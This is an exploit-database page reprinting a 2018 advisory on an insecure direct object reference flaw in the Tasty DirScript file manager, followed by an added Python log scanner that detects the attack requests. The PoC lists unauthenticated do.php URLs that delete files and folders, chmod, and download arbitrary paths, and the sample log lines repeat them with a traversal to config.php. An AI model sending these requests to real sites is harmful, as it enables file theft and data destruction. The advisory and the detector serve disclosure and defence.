Tasty DirScript All Version Insecure Direct Object References vulnerability

CVE: N/A
Category: CWE-284
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2018-08-10
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02196
EPSSP: 0.49976

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080072

Below is a copy:

[+] Exploit Title ; Tasty DirScript All Version Insecure Direct Object References vulnerability

[+] Date : 2018-08-10

[+] Author : Work LearninG

[+] Vendor Homepage : http://www.p30script.ir/1257-%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%A7%D8%B3%DA%A9%D8%B1%DB%8C%D9%BE%D8%AA-%D9%81%D8%A7%DB%8C%D9%84-%D9%85%D9%86%DB%8C%D8%AC%D8%B1-tastydir.html

[+] Version : All Version

[+] Dork : N/A

[+] My Site : https://worklearning.ir

[+] Tested On : Windows 10 - Kali Linux 2.0

[+] Contact : [email protected]

[+] Description :

[!] Tasty dir is a file manager.
[+] PoC :

[!] Mkdir : http://localhost/sc/_tastydir/do.php?mkdir=dir name

[!] deletefile : http://localhost/sc/_tastydir/do.php?delf=Your File Name

[!] Delete Folder : http://localhost/sc/_tastydir/do.php?delfld=Your Directory Name

[!] Chmod : http://localhost/sc/_tastydir/do.php?chmod=Your File Name

[!] Get File Size : http://localhost/sc/_tastydir/do.php?getsize=Your File Name

[!] Get Info : http://localhost/sc/_tastydir/do.php?getinfo=Your File Name

[!] Download File : http://localhost/sc/_tastydir/do.php?download=C:\Users/0P3N3R/Desktop/df.txt


[+] Security Level :

[!] High

[+] Exploitation Technique:

[!] remote

[+] Request Method :

[!] GET

[+] Vulnerability Link :

[*] http://localhost/sc/_tastydir/do.php?download=C:\Users/0P3N3R/Desktop/df.txt

[+] Vulnerable File :

[!] do.php


[+] We Are : [+] 0P3N3R [+] 
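
A log check for the requests listed in the PoC, as an added example that is not part of the original advisory: it scans web server access logs in combined format for calls to _tastydir/do.php that carry one of the listed action parameters, and marks values that are absolute or traversal paths. The log lines, client addresses and the function name scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Action parameters of do.php listed in the advisory's PoC section.
ACTIONS = {"mkdir", "delf", "delfld", "chmod", "getsize", "getinfo", "download"}
# Combined/common log format: client, ident, user, [time], "METHOD target PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
# Values that point outside the managed directory: absolute or traversal paths.
ESCAPE_RE = re.compile(r'^(?:[A-Za-z]:[\\/]|[\\/])|(?:^|[\\/])\.\.(?:[\\/]|$)')

def scan(lines):
    """Return one finding per do.php file action found in the log lines."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/_tastydir/do.php"):
            continue
        # parse_qsl percent-decodes values, so %5C and %2F are seen as \ and /
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in ACTIONS:
                findings.append({
                    "client": client, "method": method, "action": name,
                    "value": value, "status": int(status),
                    "escapes_root": bool(ESCAPE_RE.search(value)),
                })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2018:10:00:01 +0000] "GET /sc/_tastydir/do.php?download=C:%5CUsers/demo/Desktop/df.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Aug/2018:10:00:05 +0000] "GET /sc/_tastydir/do.php?delf=report.txt HTTP/1.1" 200 2',
    '198.51.100.4 - - [10/Aug/2018:10:01:00 +0000] "GET /sc/index.php?page=2 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [10/Aug/2018:10:02:00 +0000] "GET /sc/_tastydir/do.php?getinfo=..%2F..%2Fconfig.php HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with escapes_root set and a 200 status is the case to triage first, since it means a path outside the file manager's directory was served or modified.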
